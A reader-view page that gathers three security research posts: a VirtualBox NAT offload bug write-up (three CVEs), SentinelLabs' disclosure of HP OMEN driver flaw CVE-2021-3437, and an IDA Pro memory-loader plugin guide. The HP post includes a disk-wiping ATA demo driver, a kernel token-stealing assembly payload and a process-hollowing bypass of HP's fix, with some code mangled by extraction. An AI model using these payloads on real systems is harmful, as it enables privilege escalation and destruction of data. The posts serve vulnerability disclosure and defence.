Reading view

There are new articles available, click to refresh the page.

GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

23 November 2021 at 11:56

Introduction

The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

static DECLCALLBACK(void) drvNATSendWorker(PDRVNAT pThis, PPDMSCATTERGATHER pSgBuf)
{
#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
   Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
#endif
   if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
   {
       struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
       if (m)
       {
           /*
            * A normal frame.
            */
           pSgBuf->pvAllocator = NULL;
           slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
       }
       else
       {
           /*
            * GSO frame, need to segment it.
            */
           /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
           uint8_t         abHdrScratch[256];
#endif
           uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
           PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
           uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
           for (uint32_t iSeg = 0; iSeg pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
               if (!m)
                   break;
 
#if 1
               uint32_t cbPayload, cbHdrs;
               uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                           iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
               memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
 
               slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);
#else
...

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” and after going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer was “More than I expected” when using the Paravirtualization Network device called VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (In this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting but instead uses three separate arrays:

A Descriptor array that contains the following data per-descriptor:
- Address – The physical address of the data being transferred.
- Length – The length of data at the address.
- Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
- Next – Used when there is chaining.
An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally the CPU would handle all of the heavy lifting when calculating transport layer checksums or segmenting them into smaller ethernet packet sizes. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, thus removing the strain on the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need of hardware support by delaying segmentation until just before the network driver receives the message. This resulted in GSO being created.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
{
   uint8_t  u8Flags;
   uint8_t  u8GSOType;
   uint16_t u16HdrLen;
   uint16_t u16GSOSize;
   uint16_t u16CSumStart;
   uint16_t u16CSumOffset;
};

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
{
   /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
   uint8_t             u8Type;
   /** The total header size. */
   uint8_t             cbHdrsTotal;
   /** The max segment size (MSS) to apply. */
   uint16_t            cbMaxSeg;
 
   /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
   uint8_t             offHdr1;
   /** Offset of the second header (TCP / UDP).  0 if not not needed. */
   uint8_t             offHdr2;
   /** The header size used for segmentation (equal to offHdr2 in UFO). */
   uint8_t             cbHdrsSeg;
   /** Unused. */
   uint8_t             u8Unused;
} PDMNETWORKGSO;

Once this has been constructed, the VirtIO code creates a scatter-gatherer to assemble the frame from the various descriptors:

          /* Assemble a complete frame. */
               for (unsigned int i = 1; i  0; i++)
               {
                   unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                   PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                    
                                     ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                                     cbSegment);
                   uOffset += cbSegment;
                   uSize -= cbSegment;
               }

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

MCLBYTES (0x800 bytes)
MJUM9BYTES (0x2400 bytes)
MJUM16BYTES (0x4000 bytes)

struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
{
   struct mbuf *m;
   int size = MCLBYTES;
   LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));
 
   if (cbMin 
If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.
/** @def AssertMsgFailed
* An assertion failed print a message and a hit breakpoint.
*
* @param   a   printf argument list (in parenthesis).
*/
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
   do { \
       RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
       RTAssertMsg2Weak a; \
       RTAssertPanic(); \
   } while (0)
#else
# define AssertMsgFailed(a)     do { } while (0)
#endif

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability
Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:
DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
{
   size_t cbPayload;
   Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
   cbPayload = cbFrame - pGso->cbHdrsSeg;
   return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);
}

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.
CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds
The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.
Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.
In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:
       case PDMNETWORKGSOTYPE_IPV4_UDP:
           if (iSeg == 0)
               pdmNetGsoUpdateUdpHdrUfo(RTNetIPv4PseudoChecksum((PRTNETIPV4)&pbFrame[pGso->offHdr1]),
                                        pbSegHdrs, pbFrame, pGso->offHdr2);

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:
RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
{
   bool fOdd;
   u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
   fOdd = false;
   u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
   return rtNetIPv4FinalizeChecksum(u32Sum);
}

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).
rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:
   /* iterate the data. */
   while (cbData > 1)
   {
       u32Sum += *pw;
       pw++;
       cbData -= 2;
   }

From an exploitation perspective, adding large amounts of out of bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets with the UDP size parameter being added two bytes at a time, it is possible to calculate the difference in each checksum and disclose the out of bounds data.
On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)
Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs! pic.twitter.com/Ir9YQgdZQ7
— maxpl0it (@maxpl0it) August 1, 2021

 
Outro
Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

SentinelLabs

Kasif Dekel

14 September 2021 at 11:00

Executive Summary

SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
HP has released a security update to its customers to address these vulnerabilities.
At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Introduction

HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen as on some signed HP versions the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via IOCTLs interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons by keeping as much code as possible from the kernel-module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

#define BASE 0x1F0

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command


	for (int j = 0; j < sector_count; j++) {
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { USHORT a = port_word_in(BASE); DbgPrint("0x%x, ", a); } } } void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) { ATA_wait_BSY(); port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
	{
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { port_long_out(BASE, 0xffffffff); } } } static void ATA_wait_BSY() //Wait for bsy to be 0 { while (port_byte_in(BASE + 7) & STATUS_BSY); } static void ATA_wait_DRQ() //Wait fot drq to be 1 { while (!(port_byte_in(BASE + 7) & STATUS_RDY)); } NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry) { UNREFERENCED_PARAMETER(registry); driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);

	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write to MSR accordingly. Documentation for WRMSR and RDMSR can be found on Intel(R) 64 and IA-32 Architecture Software Developer’s Manual Volume 2 Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like as follows:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACLs enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device

The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
	{
		const auto dbg_print = reinterpret_cast(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
		elevate_privileges(current_process_id);
	});

The assembly payload:

elevate_privileges proc
_start:
	push rsi
	mov rsi, rcx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
	
__findsys:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, 4
	jnz __findsys

	mov rax, rbx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

__findarg:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi
	jnz __findarg

	mov rcx, [rax + 4b8h]
	and cl, 0f0h
	mov [rbx + 4b8h], rcx

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Watch Now

Initially, HP developed a fix that verifies the initiator user-mode applications that communicate with the driver. They open the nt!_FILE_OBJECT of the callee, parsing its PE and validating the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using various techniques such as “Process Hollowing”. Consider the following program as an example:

int main() {

    puts("Opening a handle to HpPortIO\r\n");

    hDevice = CreateFileW(L"\\\\.\\HpPortIO", FILE_ANY_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %d\r\n", GetLastError());


        return -1;

    }

    printf("succeeded! handle: %x\r\n", hDevice);

    return -1;

}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed. Some of its protected structure/data are MSRs, but since PatchGuard samples these assets periodically, restoring the original values very quickly may enable you to bypass it.

Impact

An exploitable kernel driver vulnerability can lead an unprivileged user to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

HP OMEN Gaming Hub prior to version 11.6.3.0 is affected
HP OMEN Gaming Hub SDK Package prior 1.0.44 is affected

Development Suggestions

To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations.

Remediation

HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.

Conclusion

This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17, Feb, 2021 – Initial report
17, Feb, 2021 – HP requested more information
14, May, 2021 – HP sent us a fix for validation
16, May, 2021 – SentinelLabs notified HP that the fix was insufficient
07, Jun, 2021 – HP delivered another fix, this time disabling the whole feature
27, Jul, 2021 – HP released an update to the software on the Microsoft Store
14, Sep 2021 – HP released a security advisory for CVE-2021-3437
14, Sep 2021 – SentinelLabs’ research published

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

SentinelLabs

Roman Rusetsky

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

Download zip with binaries from here.
Extract the zip files to a folder.
Place the loaders in the loaders directory of IDA.
1. 1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
  2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

Place the memory loader DLL in the IDA directory folder.
1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

Open IDA and choose zip file.
IDA should automatically suggest the loader:
Once selected, a list of the files from the zip will be displayed:
IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

Open any file on your computer in a directory you have write privileges to.
The UrlLoader will suggest a file to open.
After you chose UrlLoader, you will be asked enter a URL:
The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

1. Open a DLL project in Visual Studio
2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
1. X64 | X64 – 64 bit IDA with 64 BIT addresses
2. X32 | X64 – 64 bit IDA with 32 BIT addresses

Target file name (Configuration Properties -> Target Name)
1. X64 | X64 – $(ProjectName)64
2. X32 | X64 – $(ProjectName)
Include header files: (Similar in: (X64 | x64) and( X64 | X32)
1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
2. Set Runtime Library -> Multi-threaded Debug (/MTd)
Include lib files:
1. X64 | X64
  1. idasdk75\lib\x64_win_vc_64
X64 | X32
1. idasdk75\lib\x64_win_vc_32
2. idasdk75\lib\x64_win_vc_64
Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
1. X64 | X64 add: __EA64__
2. X32 | X64 add: __X64__, __NT__
Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.